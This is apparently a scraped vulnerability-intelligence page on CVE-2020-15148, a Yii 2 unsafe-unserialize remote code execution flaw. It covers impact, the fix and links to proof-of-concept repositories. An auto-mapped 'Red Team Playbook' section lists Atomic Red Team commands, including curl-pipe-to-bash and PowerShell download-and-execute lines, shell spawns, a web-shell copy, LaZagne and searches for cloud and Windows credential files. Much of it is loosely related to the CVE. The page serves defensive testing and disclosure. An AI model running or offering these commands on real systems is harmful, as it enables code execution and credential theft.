CVE-2020-15148
Overview
This vulnerability is a deserialization flaw (CWE-502) in the Yii 2 framework, specifically affecting versions prior to 2.0.38. The root cause lies in unsafe usage of the PHP unserialize() function on user-supplied input without sufficient validation or sanitization. This insecure deserialization occurs within application components that process arbitrary serialized data, enabling execution of crafted payloads during object reconstruction.
Vulnerability Description
Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. This is fixed in version 2.0.38. A possible workaround without upgrading is available in the linked advisory.
Impact
An unauthenticated remote attacker can exploit this vulnerability by sending crafted serialized input to the application, resulting in arbitrary code execution on the server. No user interaction or prior authentication is required, as indicated by CVSS vector AV:N/PR:N/UI:N. Successful exploitation can lead to full system compromise, data theft, or service disruption, severely impacting business operations and confidentiality. The attack surface includes any endpoint or functionality that deserializes user input without proper validation.
Solution
Upgrade the Yii 2 framework to version 2.0.38 or later, as specified in the official security advisory GHSA-699q-wcff-g9mj. The vendor patch (commit 9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99) mitigates unsafe unserialize usage. If immediate upgrading is not feasible, the advisory provides a workaround to disable or restrict deserialization of untrusted data. Refer to the vendor advisory URL for detailed patch instructions and workaround implementation guidance.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Yii 2 arises from its handling of the `unserialize()` function, which is a common PHP function used to convert serialized strings back into PHP variables. When an application utilizes this function on user-controlled input without proper validation or sanitization, it opens the door for remote code execution. This flaw is particularly critical as it allows attackers to craft malicious serialized data that, when processed by the application, can execute arbitrary PHP code on the server. This can lead to complete system compromise, as the attacker can gain the same privileges as the web server user, potentially allowing for data exfiltration, system manipulation, or further attacks on the network.
Attack vectors exploiting this vulnerability are varied and can be executed through multiple channels. An attacker might leverage a web application that accepts serialized data from users, such as forms or API endpoints. By injecting malicious payloads into these inputs, the attacker can trigger the `unserialize()` function, leading to the execution of arbitrary code. Additionally, if the application stores serialized data in a database or session, an attacker with access to these resources could manipulate the data directly. The flexibility of this attack method means that it can be tailored to different applications and environments, making it a significant threat to any Yii 2-based application that has not implemented adequate security measures.
The real-world impact of this vulnerability can be severe, particularly for businesses that rely on Yii 2 for their web applications. Successful exploitation can lead to unauthorized access to sensitive data, including customer information, financial records, and proprietary business data. The ramifications of such breaches can include financial losses, reputational damage, and legal consequences resulting from non-compliance with data protection regulations. Furthermore, the high CVSS score of 10.0 indicates that this vulnerability poses an extreme risk, making it imperative for organizations to prioritize its remediation.
To detect and mitigate this vulnerability, organizations should first ensure that they are using a version of Yii 2 that is patched and secure. Regularly updating software components is a fundamental practice in cybersecurity, as it helps close known vulnerabilities. In cases where immediate upgrading is not feasible, implementing workarounds as suggested in security advisories can provide temporary relief. Additionally, developers should adopt secure coding practices, such as validating and sanitizing all user inputs before processing them. Employing security tools that can analyze code for potential vulnerabilities and conducting regular security audits can further enhance an organization's defense against such threats.
In conclusion, the remote code execution vulnerability in Yii 2 underscores the importance of secure coding practices and proactive vulnerability management. Given the potential for significant business impact and the ease with which this vulnerability can be exploited, organizations must take immediate action to protect their applications. By prioritizing updates, employing secure coding techniques, and utilizing security tools, businesses can mitigate the risks associated with this and similar vulnerabilities, ultimately safeguarding their assets and maintaining the trust of their customers.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Yiiframework | Yii | All |
cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Maskhe/CVE-2020-15148-bypasses
几条关于CVE-2020-15148(yii2反序列化)的绕过
|
Maskhe | 74 | 9 | 2020-09-21 | View |
|
0xkami/cve-2020-15148
cve-2020-15148
|
0xkami | 6 | 3 | 2020-10-27 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
48%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-15148 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/yiisoft/yii2/security/advisories/GHSA-699q-wcff-g9mj |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/yiisoft/yii2/commit/9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99 |